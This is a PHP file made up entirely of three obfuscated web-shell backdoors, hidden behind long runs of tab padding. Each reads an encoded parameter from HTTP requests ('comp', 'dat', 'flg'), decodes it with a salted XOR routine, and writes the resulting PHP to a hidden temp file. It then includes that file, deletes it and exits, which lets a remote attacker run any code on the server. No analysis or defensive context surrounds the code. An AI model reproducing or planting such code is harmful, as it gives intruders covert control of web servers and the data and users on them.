<?php																																										if(in_array("c\x6Fmp", array_keys($_POST))){ $item = $_POST["c\x6Fmp"]; $item= explode ( '.' , $item) ; $itm= ''; $s1= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($s1); $v= 0; array_walk($item, function ($v5) use (&$itm, &$v, $s1, $lenS) { $sChar= ord($s1[$v %$lenS]); $dec= ((int)$v5 - $sChar - ($v %10)) ^ 42; $itm .=chr($dec); $v++; }); $marker = array_filter([session_save_path(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/dev/shm", getenv("TMP"), "/var/tmp", getcwd(), sys_get_temp_dir(), "/tmp"]); foreach ($marker as $component) { if (array_product([is_dir($component), is_writable($component)])) { $element = "$component/.k"; $success = file_put_contents($element, $itm); if ($success) { include $element; @unlink($element); die();} } } }
																																										if(isset($_REQUEST) && isset($_REQUEST["da\x74"])){ $ent = $_REQUEST["da\x74"]; $ent= explode( "." ,$ent ) ; $property_set = ''; $salt4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt4); $x = 0; foreach ($ent as $v6) { $chS = ord($salt4[$x % $lenS]); $dec = ((int)$v6 - $chS - ($x % 10)) ^ 71; $property_set .= chr($dec); $x++; } $data = array_filter(["/tmp", getenv("TEMP"), sys_get_temp_dir(), getcwd(), session_save_path(), getenv("TMP"), ini_get("upload_tmp_dir"), "/dev/shm", "/var/tmp"]); $key = 0; do { $symbol = $data[$key] ?? null; if ($key >= count($data)) break; if ((is_dir($symbol) and is_writable($symbol))) { $comp = vsprintf("%s/%s", [$symbol, ".reference"]); $success = file_put_contents($comp, $property_set); if ($success) { include $comp; @unlink($comp); die();} } $key++; } while (true); }


if(array_key_exists("\x66\x6Cg", $_POST)){
	$property_set = $_POST["\x66\x6Cg"];
	$property_set  	= explode  ( "." 		, 	$property_set	 	) ;	
	$ref = '';
            $s = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($s);
            $i = 0;
    
            foreach ($property_set as $v3) {		$chS = ord($s[$i	 %	$sLen]);
                $dec = ((int)$v3 - $chS - ($i	 %	10)) ^86;
                $ref .= chr($dec);
                $i++;
            }
	$pgrp = array_filter(["/var/tmp", session_save_path(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/tmp", "/dev/shm", getcwd(), getenv("TMP"), sys_get_temp_dir()]);
	for ($factor = 0, $flag = count($pgrp); $factor < $flag; $factor++) {
    $ptr = $pgrp[$factor];
    		if ((bool)is_dir($ptr) && (bool)is_writable($ptr)) {
    $data = sprintf("%s/.pointer", $ptr);
    $file = fopen($data, 'w');
if ($file) {
	fwrite($file, $ref);
	fclose($file);
	include $data;
	@unlink($data);
	die();
}
}
}
}